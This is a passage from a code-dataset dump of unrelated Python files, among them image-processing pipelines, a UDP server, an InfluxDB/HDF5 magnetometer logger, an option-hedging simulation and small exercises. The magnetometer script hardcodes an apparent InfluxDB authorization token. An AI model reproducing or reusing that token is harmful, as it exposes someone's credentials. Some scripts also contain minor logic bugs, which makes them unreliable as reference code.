removeSmallImages(digitImages)\n\n\nfor image in digitImages:\n print(\"coords = \",image[0])\n print(\"Image shape = \",image[1].shape)\n print(\"Image =\",image[1])\n 
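    # preview each kept crop; the cv2.waitKey check below lets Esc (key 27) abort the loop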
plt.imshow(image[1])\n plt.show()\n key = cv2.waitKey(0)\n if key == 27:\n sys.exit(0)\n\"\"\"\n#digitImages = np.array(digitImages)\n\n#print('digitImages = ',digitImages)\n","sub_path":"code/identifycells/identifyDigits.py","file_name":"identifyDigits.py","file_ext":"py","file_size_in_byte":6044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"8309333","text":"\nclass Data(object):\n\n record_e = False\n keyword = None\n data = []\n total = 0\n name = []\n current_pos = 0\n end_pos = 0\n data_period = ['_1M.hist', '_5M.hist', '_15M.hist', '_30M.hist', '_1H.hist', '_4H.hist']\n\n def __init__(self, symbol, period, load_num=750, load_all=False):\n self.load_num = load_num\n self.load_all = load_all\n self.symbol = symbol\n self.period = period\n self._init_file(period, symbol)\n\n def _readall(self, filename):\n file_all = open(filename, 'rt')\n for line in file_all:\n line = line.split(',')\n line = [float(x) for x in line]\n self.data.append(line)\n file_all.close()\n self.next = self._nextall\n\n def next(self):\n pass\n\n def _nextall(self):\n self.current_pos += 1\n if self.current_pos < self.end_pos:\n return True\n else:\n self.current_pos -= 1\n return False\n\n def _nextnum(self):\n self.current_pos += 1\n if self.record_e:\n self.current_pos -= 1\n return False\n else:\n line = self.file_num.readline().split(',')\n if not line:\n self.file_num.close()\n self.record_e = True\n return False\n else:\n line = [float(x) for x in line]\n self.data.append(line)\n if len(self.data) > self.load_num:\n self.data.pop(0)\n return True\n\n def _readnum(self, filename):\n self.file_num = open(filename, 'rt')\n line = self.file_num.readline().split(',')\n line = [float(x) for x in line]\n self.data.append(line)\n self.next = self._nextnum\n\n def _init_file(self, period, symbol):\n path = '../../historical_data/'\n if period == 1:\n self.filename = path + symbol + self.data_period[0]\n elif period == 5:\n self.filename = path + symbol + self.data_period[1]\n elif period == 15:\n self.filename = path + symbol + self.data_period[2]\n elif period == 30:\n self.filename = path + symbol + self.data_period[3]\n elif period == 60:\n self.filename = path + symbol + self.data_period[4]\n elif period == 240:\n self.filename = path + symbol + self.data_period[5]\n self.total += 1\n if period == 240:\n self._readall(self.filename)\n self.end_pos = self.load_num\n else:\n self._readnum(self.filename)\n self.end_pos = self.load_num\n\n def get(self, shift=None, price_type=None):\n if self.current_pos - shift >= 0 and self.next == self._nextall:\n return self.data[self.current_pos - shift][price_type]\n elif self.next == self._nextnum:\n return self.data[-1 - shift][price_type]\n else:\n return False\n\n\n\nclass Database(object):\n\n def __init__(self, symbol):\n self.current_pos = 0\n self.data_1M = Data(symbol, 1, 10000, False)\n self.data_5M = Data(symbol, 5, 2000, False)\n self.data_15M = Data(symbol, 15, 750, False)\n self.data_30M = Data(symbol, 30, 500, False)\n self.data_1H = Data(symbol, 60, 200, False)\n self.data_4H = Data(symbol, 240, 50, False)\n\n def next(self):\n if self.data_1M.next() and self.current_pos != -1:\n self.current_pos += 1\n if self.current_pos % 5 == 0 and self.current_pos != 5:\n self.data_5M.next()\n if self.current_pos % 15 == 0 and self.current_pos != 15:\n self.data_15M.next()\n if self.current_pos % 30 == 0 and self.current_pos != 30:\n self.data_30M.next()\n if self.current_pos % 60 == 0 and self.current_pos != 
60:\n self.data_1H.next()\n if self.current_pos % 240 == 0 and self.current_pos != 240:\n self.data_4H.next()\n return True\n elif not self.data_1M.next() and self.current_pos != -1:\n self.data_1M.next()\n self.data_5M.next()\n self.data_15M.next()\n self.data_30M.next()\n self.data_1H.next()\n self.data_4H.next()\n self.current_pos = -1\n return True\n elif self.current_pos == -1:\n return False\n\n def get(self, period, shift, price_type):\n if period == 1:\n return self.data_1M.get(shift, price_type)\n elif period == 5:\n return self.data_5M.get(shift, price_type)\n elif period == 15:\n return self.data_15M.get(shift, price_type)\n elif period == 30:\n return self.data_30M.get(shift, price_type)\n elif period == 60:\n return self.data_1H.get(shift, price_type)\n elif period == 240:\n return self.data_4H.get(shift, price_type)\n\n\n\nif __name__=='__main__':\n import datetime\n starttime = datetime.datetime.now()\n d=Database('EURUSD')\n while d.next():\n print(d.get(1,0,3))\n endtime = datetime.datetime.now()\n interval = (endtime - starttime).seconds\n print(interval)\n\n\n","sub_path":"quantlib/core/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"529574998","text":"import socket\n\nip_address = '127.0.0.1'\nport_number = 3333\n\nserver_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nserver_sock.bind((ip_address, port_number))\nprint(\"Server socket open...\")\nprint(\"------------------------------------------------------\")\nprint(\"Listening...\")\nwhile True:\n\tdata,addr = server_sock.recvfrom(5000)\n\trecvType = data.decode()[0:1]\n\trecvData = data.decode()[1:]\n\tprint(\"Type of Message : \" + data.decode()[0:1])\n\tprint(\"Received Message from client : \" + recvData)\n\tif recvType == \"0\":\n\t\tdata = recvData.upper()\n\telif recvType == \"1\":\n\t\tdata = recvData.lower()\n\telif recvType == \"2\":\n\t\tdata = recvData.swapcase()\n\telif recvType == \"3\":\n\t\tdata = recvData[::-1]\n\tprint(\"Converted Message : \" + str(data))\n\n\tserver_sock.sendto(data.encode(), addr)\n\tprint(\"Send message to client back...\")\n\tprint(\"------------------------------------------------------\")\n\tprint(\"Listening...\")\n\n\n\n","sub_path":"UDP/simple_UDP/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"391788576","text":"\"\"\"\nCode for pre-set pipelines of processing operations for numpy arrays of tif stacks\n\nRequires PIL and numpy as external packages\n\nRequires these other packages from ptmc:\nio\nprocessing\n\"\"\"\n\n#Import other packages\nimport numpy as np\nimport os\nfrom PIL import Image\nimport gc\n#PTMC itself\nimport io\nimport processing as pro\n\n\ndef makeReferenceFrame(refTif, saveDir=None, method='Median_Homomorphic'):\n '''\n Code to make a reference frame and save the output as a Tif.\n refTif is the full path to a Tif Stack to create a Reference Frame from\n refArray is a homomorphic filtered, mean intensity image that is motion corrected from refTif\n method is the method to use to make the reference frame, with the default being a Median Filter followed by a Homomorphic Filtering of the images, prior to motion correction\n A hidden output is a tif of the same name with '_MCrefImage\" appended to the end, which is a saved version of refArray\n '''\n #Insert functions for different 
registration methods\n def Median_Homomorphic(refTif, saveDir):\n #Parse path info in reference Tif\n fileparts = os.path.split(refTif)\n if saveDir is None: #If no save directory provided\n saveDir = fileparts[0]\n \n #Loading\n print('Loading Reference file ' + refTif)\n imgstack, fileparts = io.loadImageStack(inputTif=refTif)\n \n #Processing Steps\n print('Processing Reference file ' + refTif)\n medstack = pro.doMedianFilter(imgstack, med_fsize=3)\n homomorphstack = pro.doHomomorphicFilter(medstack, sigmaVal=7)\n del medstack #Remove to save memory\n gc.collect()\n homoshift, yshift, xshift = pro.registerImages(homomorphstack)\n rawshift = pro.applyFrameShifts(imgstack, yshift, xshift)\n #Save Reference Frame\n print('Saving Reference file ' + refTif)\n refArray = homoshift.mean(axis=0).astype(np.uint16)\n refIm = Image.fromarray(refArray)\n refIm.save(saveDir+'/'+fileparts[1][:-4]+'_MCrefImage.tif')\n rawRefArray = rawshift.mean(axis=0).astype(np.uint16)\n rawIm = Image.fromarray(rawRefArray)\n rawIm.save(saveDir+'/'+fileparts[1][:-4]+'_MCrefImageRaw.tif')\n print('Completed Reference file ' + refTif + '\\n')\n \n return refArray, rawRefArray\n \n #Dictionary for method selection and return\n method_select = {\n 'Median_Homomorphic': Median_Homomorphic(refTif, saveDir),\n }\n\n #Run the selected method from the dictionary the method_select dictionary\n return method_select.get(method, \"ERROR: No function defined for Provided Method\")\n\ndef correctImageStack(Tif, refIm, saveDir=None, method='Median_Homomorphic'):\n '''\n Perform motion correction and save output for a tif with a provided reference frame\n Tif is the full name and path to a single multipage tif\n refIm is the reference image to correct to\n saveDir is the directory to save the corrected images and outputs in\n method is the method to use to correct the image stack, with the default being a Median Filter followed by a Homomorphic Filtering of the images.\n Hidden outputs are the x & y shifts for each frame, motion corrected homomorphic filtered image stack, and motion corrected raw image stack, all saved within saveDir\n '''\n #Insert functions for different registration methods\n def Median_Homomorphic(Tif, refIm, saveDir):\n '''\n Perform motion correction and save output for a tif with a provided reference frame\n Tif is the full name and path to a single multipage tif\n refIm is the reference image to correct to\n saveDir is the directory to save the corrected images and outputs in\n '''\n #Parse path info in reference Tif\n fileparts = os.path.split(Tif)\n if saveDir is None: #If no save directory provided\n saveDir = fileparts[0]\n \n #Loading\n print('Loading file ' + Tif)\n imgstack, fileparts = io.loadImageStack(inputTif=Tif) \n #Processing Steps\n print('Processing file ' + Tif)\n medstack = pro.doMedianFilter(imgstack, med_fsize=3)\n homomorphstack = pro.doHomomorphicFilter(medstack, sigmaVal=7)\n homoshift, yshift, xshift = pro.registerImages(homomorphstack, Ref=refIm)\n rawshift = pro.applyFrameShifts(imgstack, yshift, xshift)\n #Save Output\n print('Saving file ' + Tif)\n io.saveFrameShifts(yshift, xshift, \n saveDir+'/'+fileparts[1], \n saveDir+'/'+fileparts[1][:-4]+'_frameShifts.hdf5')\n io.saveImageStack(homoshift, saveDir+'/m_f_'+fileparts[1])\n io.saveImageStack(rawshift, saveDir+'/m_'+fileparts[1])\n print('Completed file ' + Tif + '\\n')\n \n #Dictionary for method selection and return\n method_select = {\n 'Median_Homomorphic': Median_Homomorphic(Tif, refIm, saveDir),\n }\n\n #Run the selected 
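Note that in both pipeline functions above, `method_select = {'Median_Homomorphic': Median_Homomorphic(refTif, saveDir)}` executes the worker while the dictionary is being built, so the pipeline runs regardless of which `method` was requested, and the subsequent `.get(method, ...)` merely returns an already-computed value. A sketch of the conventional dispatch-table shape — store the callables and invoke only after lookup (the names mirror the record; the body here is a stub):

```python
def make_reference_frame(ref_tif, save_dir=None, method='Median_Homomorphic'):
    def median_homomorphic(ref_tif, save_dir):
        # ... median filter, homomorphic filter, registration, saving ...
        return "refArray", "rawRefArray"  # stand-in for the real outputs

    # Map names to function objects -- nothing runs while the dict is built.
    method_select = {
        'Median_Homomorphic': median_homomorphic,
    }
    try:
        chosen = method_select[method]
    except KeyError:
        raise ValueError("No function defined for method %r" % method)
    # Only the requested method executes, and only at this point.
    return chosen(ref_tif, save_dir)

print(make_reference_frame("stack.tif"))  # illustrative filename
```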
method from the dictionary the method_select dictionary\n return method_select.get(method, \"ERROR: No function defined for Provided Method\")\n\n","sub_path":"ptmc/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":5110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"399200502","text":"import csv, requests, unicodedata, hashlib, os\n\n# CSV2DICT\ndef csv2dict (csv_url, csv_delimiter):\n ''' csv2dict\n Get CSV from URL and convert to Python dict().\n \n Params:\n - csv_url: URL from remote\n - csv_delimiter: Delimiter (example: '~' or '.')\n '''\n # Set CSV URL\n CSV_URL = csv_url\n\n with requests.Session() as session:\n # Outout CONTENT_LIST\n CONTENT_LIST = []\n \n # Get hash from content\n hash_object = hashlib.sha512(str(CSV_URL).encode('utf-8'))\n hex_dig = hash_object.hexdigest()\n \n # Create cache dir if not exist\n cache_path = '__pycache__/csv2dict/'\n if not os.path.exists(cache_path):\n os.makedirs(cache_path)\n \n # Check cached file and load if exists\n cache_file = cache_path + str(hex_dig)\n if(os.path.exists(cache_file)):\n encoded_content = open(cache_file, 'r', encoding='utf-8').read()\n\n # Get CSV from remote if cache doesn't exist\n else:\n request = session.get(CSV_URL)\n encoded_content = request.content.decode(request.encoding)\n open(cache_file, 'w', encoding='utf-8').write(encoded_content)\n \n # Create list of all elements\n cr = csv.reader(encoded_content.splitlines(), delimiter=csv_delimiter)\n lines = list(cr)\n\n # CSV header (colunm names)\n colunm_names = lines.pop(0)\n\n # Fix encode\n for l_i, line in enumerate(lines):\n for c_i, colunm in enumerate(line):\n lines[l_i][c_i] = unicodedata.normalize('NFKD', colunm).encode('ASCII','ignore').decode('ASCII')\n\n # Create CONTENT_LIST\n for l_i, line in enumerate(lines):\n tmpItem = {}\n for c_i, colunm in enumerate(line):\n tmpItem[colunm_names[c_i]] = lines[l_i][c_i]\n CONTENT_LIST.append(tmpItem)\n \n return CONTENT_LIST\n ","sub_path":"examples/app-aviacao-civil-brasil/libraries/csv2dict.py","file_name":"csv2dict.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"464382990","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import fft\nimport skimage.graph.mcp as mcp\nfrom skimage import data, img_as_float\n\nfrom skimage._shared.testing import assert_array_equal\n\nsrc = img_as_float(data.camera()[128:256, 128:256])\nsrc = src + 0.05 * np.random.standard_normal(src.shape)\ntarget = np.roll(src, (15, -10), axis=(0, 1))\ntarget = target + 0.05 * np.random.standard_normal(target.shape)\nsrc_freq = fft.fftn(src)\ntarget_freq = fft.fftn(target)\n\n# current implementation\nimage_product1 = src_freq * target_freq.conj()\ncross_correlation1 = fft.ifftn(image_product1)\n\n# fixed implementation\nimage_product = image_product1 / np.abs(image_product1)\ncross_correlation = fft.ifftn(image_product)\n\nfig, axes = plt.subplots(1, 2)\naxes[0].imshow(np.abs(cross_correlation1), cmap=plt.cm.gray)\naxes[0].set_title('Existing Implementation')\naxes[1].imshow(np.abs(cross_correlation), cmap=plt.cm.gray)\naxes[1].set_title('Proposed Implementation')\nfor ax in axes:\n ax.set_axis_off()\nplt.tight_layout()\nplt.show()\n\n 
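The scikit-image test above contrasts plain cross-correlation with phase correlation: dividing the cross-power spectrum by its magnitude leaves only phase, so the inverse FFT collapses to a sharp peak at the translation. A self-contained sketch recovering a known `np.roll` shift (array size and shift values are illustrative):

```python
import numpy as np
from scipy import fft

rng = np.random.default_rng(0)
src = rng.standard_normal((128, 128))
target = np.roll(src, (15, -10), axis=(0, 1))  # known shift to recover

src_freq = fft.fftn(src)
target_freq = fft.fftn(target)

# Phase correlation: normalising by the magnitude keeps only phase differences.
product = src_freq * target_freq.conj()
product /= np.abs(product)
correlation = fft.ifftn(product)

# The inverse transform peaks at the (circularly wrapped) translation.
peak = np.unravel_index(np.argmax(np.abs(correlation)), correlation.shape)
shift = [p if p <= s // 2 else p - s for p, s in zip(peak, correlation.shape)]
print(shift)  # the (15, -10) roll shows up negated here: [-15, 10]
```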
\n","sub_path":"skimage/graph/tests/test_flexible.py","file_name":"test_flexible.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"165539142","text":"\"\"\"\nReads data from Honeywell HMR2300 Magnetometer, sends into InfluxDB/Grafana for live plotting, and writes to HDF5.\n\nSummer 2021\nTested On:\nStarfire (ubuntu 18.04)\nInflux 2.0.4\nGrafana 7.4.2\n\"\"\"\n\nimport serial\nimport numpy as np\n\n#ParseSerial and cython_read can be used interchangeably for parsing. cython_read was written for speed improvements, but runs similarly. If using cython, use array splitline_mag = [0,4,8,12]. Otherwise splitline_mag = [4,8,12]\n\nfrom ParseSerial import ReadSentence_Mag\n#from cython_read import ReadSentence_Mag\n\nimport requests #For posting to influx\nimport time\nimport sys\nimport h5py\nimport os\nimport glob\n\n\n\"\"\"---Authorization/QUERY initialization---\"\"\"\n#Starting with Influx 2.0, authorization tokens are necessary to access databases.\n#The token can be found under the \"Data\" tab in the Influx UI\n\n#Stringing together query access\nINFLUX_TOKEN='AjsrNgY_k97FMvgfCsgc2tPTx-lOVM-aYaCMjymNVIWpoSCkYh7H4AqIV9pLQHHk07zJa5pxTn4lo-3Ashwu5Q=='\nORG=\"tim@upenn\"\nINFLUX_CLOUD_URL='localhost'\nBUCKET_NAME='sensors'\n\n#Can change precision if needed. Currently set to nanoseconds (ns).\nQUERY_URI='http://{}:8086/api/v2/write?org={}&bucket={}&precision=ns'.format(INFLUX_CLOUD_URL,ORG,BUCKET_NAME)\n\nheaders = {}\nheaders['Authorization'] = 'Token {}'.format(INFLUX_TOKEN)\n\n#Parameters for line protocol that will be sent to Influx\nlocation_tag = 'lab'\nmeasurement_name = 'mag_data'\n\n\n\"\"\"---Serial port initialization---\"\"\"\n#Connecting to serial port. \nport ='/dev/ttyUSB5' \nbaudrate=9600\nmag = serial.Serial(port=port, baudrate=baudrate)\n\n\n\"\"\"---Parsing initilization---\"\"\"\n#Parsing parameters used in ReadSentence_Mag parse function\nheader_mag = \"0d\"\nsplitline_mag = [4,8,12]\nsentence_length_mag = 14\n\n\n\"\"\"---HDF5 logging initilization---\"\"\"\n#Number of data samples in each save file. Divide by 100 for seconds. (Magnetometer currently set to 10hz)\nN = 24000\ndataCount = 0 #Index counter\n\n#Timestamps used for filenames.\ntimestr = time.strftime(\"%Y%m%d-%H%M%S\")\ndatestamp = time.strftime(\"%Y-%m-%d-Mag\")\n\n#First check if there is a folder with current date. If there isn't, create one.\nif os.path.isdir(\"/home/user/tim-daq/data/\"+datestamp) == 0:\n os.mkdir(\"/home/user/tim-daq/data/\"+datestamp)\n\n#Then check if the folder is empty. If it's empty, the first file number will start at 1.\n#If the folder is not empty, check the file number of the last edited file, and add 1 to it for the new file. 
\nif len(os.listdir(\"/home/user/tim-daq/data/\"+datestamp)) == 0:\n file_number = 1\n file_number_string = str(file_number)\n \nelse:\n file_list = glob.glob(\"/home/user/tim-daq/data/\"+datestamp+\"/*.hdf5\")\n latest_file = max(file_list, key=os.path.getctime)\n file_number = int(latest_file[-10:-5]) + 1\n file_number_string = str(file_number)\n \n\n#Create the HDF5 file and datasets\nmagfile = h5py.File(\"/home/user/tim-daq/data/\"+datestamp+\"/Mag_\"+timestr+'_'+file_number_string.zfill(5)+\".hdf5\", \"w\", libver = 'latest')\n\nx_dset = magfile.create_dataset(\"x\", (N,), dtype='float', chunks = True, maxshape = (None,))\ny_dset = magfile.create_dataset(\"y\", (N,), dtype='float', chunks = True, maxshape = (None,))\nz_dset = magfile.create_dataset(\"z\", (N,), dtype='float', chunks = True, maxshape = (None,))\ntime_dset = magfile.create_dataset(\"time\", (N,), dtype='int64', chunks = True, maxshape = (None,))\n\n#The index dataset keeps track of the index value of the latest data point recorded.\n#This is helpful when we access the HDF5 file from another read program. The read program will know exactly which index to start reading from. \n#We can't use a \"last_value()\" function because the datasets are created with N empty spaces. \nindex_dset = magfile.create_dataset(\"index\", (1,), dtype='int64', chunks = True, maxshape = (None,))\n\n#The filenames dataset stores the file name of the current and next file.\nfilenames_dset = magfile.create_dataset(\"filenames\", (2,), dtype='int64', chunks = True, maxshape = (None,))\n\nfilenames_dset[0] = file_number\nfilenames_dset[1] = file_number + 1\n\n#Must set swmr (single writer multiple reader) to true in order to read and write concurrently.\nmagfile.swmr_mode = True\n\n\n\"\"\"---Main Loop---\"\"\"\nwhile True:\n #Extracts data from parsing function\n x_buff, y_buff, z_buff = ReadSentence_Mag(mag, header_mag, splitline_mag, sentence_length_mag) \n \n #Generates timestamp for Influx protocol\n current_point_time = int(round(time.time() * 1000000000))\n \n #Line protocol setup\n current_line = '{measurement},location={location} mag_x={x},mag_y={y},mag_z={z} {timestamp}'.format(measurement=measurement_name,location=location_tag, x=x_buff,y=y_buff,z=z_buff, timestamp=current_point_time) \n #print(current_line)\n\n #Sends data into Influx\n r = requests.post(QUERY_URI, data=current_line, headers=headers)\n #print(r.status_code)\n \n\n #Generates new HDF5 file once datacount is reached. Identical file checking and creation to program startup. 
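The writer above opens its HDF5 files with `libver='latest'`, sets `swmr_mode = True`, and flushes each dataset so a separate process can read while acquisition continues, using the `index` dataset to learn how many rows are valid. A sketch of the matching reader side — the filename is hypothetical; the dataset names mirror the writer:

```python
import h5py

def read_latest(path):
    """Return the newest flushed (time, x, y, z) sample from the writer above."""
    # swmr=True lets this open succeed while the acquisition script holds the file.
    with h5py.File(path, "r", libver="latest", swmr=True) as f:
        dsets = {name: f[name] for name in ("index", "time", "x", "y", "z")}
        for dset in dsets.values():
            dset.refresh()  # pick up rows the writer flushed after our open
        i = int(dsets["index"][0])  # last row the writer marked as valid
        return tuple(dsets[name][i] for name in ("time", "x", "y", "z"))

# print(read_latest("Mag_20210701-120000_00001.hdf5"))  # hypothetical filename
```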
\n if dataCount >= N:\n magfile.close() #Important to close current file!\n current_timestr = time.strftime(\"%Y%m%d-%H%M%S\")\n datestamp = time.strftime(\"%Y-%m-%d-Mag\")\n \n if os.path.isdir(\"/home/user/tim-daq/data/\"+datestamp) == 0:\n os.mkdir(\"/home/user/tim-daq/data/\"+datestamp) \n if len(os.listdir(\"/home/user/tim-daq/data/\"+datestamp)) == 0: \n file_number_string = str(1)\n else:\n file_list = glob.glob(\"/home/user/tim-daq/data/\"+datestamp+\"/*.hdf5\")\n latest_file = max(file_list, key=os.path.getctime)\n file_number = int(latest_file[-10:-5]) + 1\n file_number_string = str(file_number)\n \n \n magfile = h5py.File(\"/home/user/tim-daq/data/\"+datestamp+\"/Mag_\"+current_timestr+'_'+file_number_string.zfill(5)+\".hdf5\", \"w\", libver = 'latest')\n x_dset = magfile.create_dataset(\"x\", (N,), dtype='float', chunks = True, maxshape = (None,))\n y_dset = magfile.create_dataset(\"y\", (N,), dtype='float', chunks = True, maxshape = (None,))\n z_dset = magfile.create_dataset(\"z\", (N,), dtype='float', chunks = True, maxshape = (None,))\n time_dset = magfile.create_dataset(\"time\", (N,), dtype='int64', chunks = True, maxshape = (None,))\n index_dset = magfile.create_dataset(\"index\", (1,), dtype='int64', chunks = True, maxshape = (None,))\n filenames_dset = magfile.create_dataset(\"filenames\", (2,), dtype='int64', chunks = True, maxshape = (None,))\n \n filenames_dset[0] = file_number\n filenames_dset[1] = file_number + 1\n \n magfile.swmr_mode = True\n dataCount = 0\n \n else:\n #If datacount isn't reached, continue adding latest data into the HDF5 datasets\n x_dset[dataCount] = x_buff\n y_dset[dataCount] = y_buff\n z_dset[dataCount] = z_buff\n time_dset[dataCount] = current_point_time\n index_dset[0] = dataCount\n \n #Flushing is required to update datasets for reader programs\n x_dset.flush()\n y_dset.flush()\n z_dset.flush()\n time_dset.flush()\n index_dset.flush()\n dataCount += 1\n\n\n\n\n\n\n","sub_path":"Mag_ReadSendWrite.py","file_name":"Mag_ReadSendWrite.py","file_ext":"py","file_size_in_byte":7135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"128414337","text":"dohod = float(input())\nuspeh = float(input())\nzaplata = float(input())\n\n\nif zaplata <= dohod or uspeh < 4.5:\n print(\"You cannot get a scholarship!\")\nif dohod <= zaplata and uspeh >= 4.5:\n print(\"You get a Social scholarship {0} BGN\".format(round((zaplata - (zaplata * 0.65)))))\nelif 6 >= uspeh > 5.50:\n print(\"You get a scholarship for excellent results {0} BGN\".format(round(uspeh*25, 2)))\n","sub_path":"Basics Sept 2019/Stipendii.py","file_name":"Stipendii.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"25703917","text":"# https://pokeapi.co/\n\nimport requests\n\n\ndef get_pokemon(url=\"https://pokeapi.co/api/v2/pokemon-form/\", offset=0):\n args = {\"offset\": offset} if offset else {}\n response = requests.get(url, params=args)\n\n if response.status_code == 200:\n payload = response.json()\n results = payload.get(\"results\", [])\n\n if results:\n for pokemon in results:\n name = pokemon[\"name\"]\n print(name)\n\n next = input(\"¿Continuar Listado? 
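The `get_pokemon` function above pages by recursing with a hand-maintained `offset`. Paginated APIs of this shape usually include the next page's URL in the payload itself; assuming a `next` key alongside `results` (which PokeAPI does provide), an iterative sketch avoids both the recursion and the hard-coded page size:

```python
import requests

def iter_names(url="https://pokeapi.co/api/v2/pokemon-form/"):
    """Yield names page by page, following the payload's own `next` URL."""
    while url:
        resp = requests.get(url, timeout=10)
        resp.raise_for_status()  # surface HTTP errors instead of skipping pages
        payload = resp.json()
        for entry in payload.get("results", []):
            yield entry["name"]
        url = payload.get("next")  # None on the final page, which ends the loop

for i, name in enumerate(iter_names()):
    print(name)
    if i >= 39:  # two pages' worth, rather than prompting the user per page
        break
```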
[y/n] \\n\").lower()\n if next == \"y\":\n get_pokemon(offset=offset + 20)\n\n\nget_pokemon()\n","sub_path":"consume_api/pokeapi.py","file_name":"pokeapi.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"501725642","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 25 08:50:53 2019\n\n@author: zhangcheng\n\"\"\"\n\nimport numpy as np\nfrom scipy.stats import norm\nimport matplotlib.pylab as plt\n\n\nS=100\nsigma=0.25\nr=0.05\nT=1/12\nK=100\nN1=21\nN2=84\n\ndef simulate_stock_process(paths,steps,S,r,sigma,):\n 'Simulate stock moving process in the context of\\\n Black Scholes'\n \n deltaT=T/steps\n t=np.linspace(0,T,num=steps+1)\n X=np.c_[np.zeros((paths,1)),np.random.randn(paths,steps)]\n w=np.cumsum(np.sqrt(deltaT)*X,axis=1)\n return S*np.exp((r-1/2*sigma**2)*t+sigma*w)\n\n\n\n\ndef hedged_call(S, K, r, sigma,steps):\n 'Dynamic hedging strategy, it returns fair value of \\\n call, Delta and bond value that are shorting'\n \n t=np.linspace(0,T,num=steps+1)\n d1 = (np.log(S/K)+(r+sigma**2/2)*(T-t)) / (sigma*np.sqrt(T-t))\n d2 = d1 - sigma*np.sqrt(T-t)\n return S*norm.cdf(d1)- K*np.exp(-r*(T-t))*norm.cdf(d2), norm.cdf(d1),K*np.exp(-r*(T-t))*norm.cdf(d2)\n\ndef hedging_error(N):\n np.random.seed(0)\n deltaT=T/N\n St=simulate_stock_process(50000,N,S,r,sigma)\n# return call,delta and bond ndarray with Shape (50000,N+1)\n pcall,delta,bond=hedged_call(St,K,r,sigma,N)\n# The portfolio rebalances untill time T\n delta=delta[:,:-1]\n pcall=pcall[:,:-1]\n# the bond will grow at rf for each t\n fbond=bond*np.exp(r*deltaT)\n# profit and loss if no rebalancing made\n pnl=delta*St[:,1:]-delta*St[:,:-1]-(fbond-bond)[:,:-1]\n# the costs from implementing the rebalance to ensure delta hedged \n cost=delta[:,1:]*St[:,1:-1]-delta[:,:-1]*St[:,1:-1]-(bond[:,1:]-fbond[:,:-1])[:,:-1]\n# cash balance after deduct costs from P&L\n cashbalance=pnl[:,:-1]-cost\n# the inital call premium should be included into cash balance\n# time 0, it will just grow at risk free rate untill T. 
\n cashbalance[:,0]=cashbalance[:,0]+pcall[0,0]\n# All cash postions are expected to grow at risk free rate\n interval=len(cashbalance[1,:])\n futurecash=[]\n for i in range(interval):\n futurecash.append(cashbalance[:,i]*np.exp(r*deltaT*(interval-1-i)))\n futurecash=np.array(futurecash).T\n# the P&L at time T\n finalpnl=np.sum(futurecash,axis=1)\n# the hedging error\n return finalpnl-np.maximum(St[:,-1]-K,0)\n\ner21=hedging_error(N1)\ner84=hedging_error(N2)\n\nplt.rcParams['figure.figsize']=[15,5] \nfig,ax=plt.subplots(1,2,sharey=True)\nplt.suptitle('Black Scholes dynamic hedging error')\nax[0].grid()\nax[1].grid()\nax[0].hist(er21,range=(-1.5,1.5),density=True,color='r')\nax[0].set_xlabel('Final profit/loss')\nax[0].set_ylabel('Probability Density')\nax[0].set_title('21 rebalancing trades')\nax[1].hist(er84,range=(-1.5,1.5),density=True,color='r')\nax[1].set_title('84 rebalancing trades')\nax[1].set_xlabel('Final profit/loss')\nfig.tight_layout()\nplt.show()\nfig.savefig('Hedging_error',bbox_inches = 'tight')\n\nmean1,std1=np.mean(er21), np.std(er21)\nmean2,std2=np.mean(er84), np.std(er84)\n\n","sub_path":"Dynamic hedging/part4.py","file_name":"part4.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"191073277","text":"def media(i=[]):\n '''\n Faz a média de itens em uma lista\n :param i: qualquer lista\n :return: retorna a média em float\n '''\n n = sum(i)\n c = len(i)\n m = n / c\n return m\n\n\ndef varian(l=[]):\n '''\n Calcula a variância em uma lista\n :param l: lista qualquer com números\n :return: retorna a variância calculada\n '''\n n = n1 = s = 0\n m = media(l)\n for c in range(0, len(l)):\n n += (l[c] - m) ** 2\n n1 = c - 1\n s = n / n1\n return s\n\n\ndef desvio_pad(i=[]):\n '''\n Calcula o desvio padrão de uma lista\n :param i: lista qualquer com números\n :return: retorna o valor desvio padrão\n '''\n from math import sqrt\n s = v = 0\n v = varian(i)\n s = sqrt(v)\n return s\n\n\ndef coef_var(l=[]):\n \"\"\"\n Calcula o ceficiente de variação em uma lista de números\n :param l: lista de números qualquer\n :return: retorna o valor do coeficiente de variação\n \"\"\"\n s = m = cv = 0\n s = desvio_pad(l)\n m = media(l)\n cv = s / m\n return cv\n\n\n'''dados = list()\ncri_lis(dados)\nprint(dados)\nm = media(dados)\nprint(m)\nordenadora(dados)\nprint(dados)\nv = varian(dados)\nprint(v)\nd = desvio_pad(dados)\nprint(d)\ncv = coef_var(dados)\nprint(cv)'''\n","sub_path":"utilidades/estatic.py","file_name":"estatic.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"114726274","text":"'''\nCosmos Trading company\nSales is a dictionary with the sale for each seller identified with a code number\nBase salary is the minimum salary\nBase salary ratio is a ratio that improve the base salary based on the the qualification of each sales person\nsellers list of each seller including the salary ratio 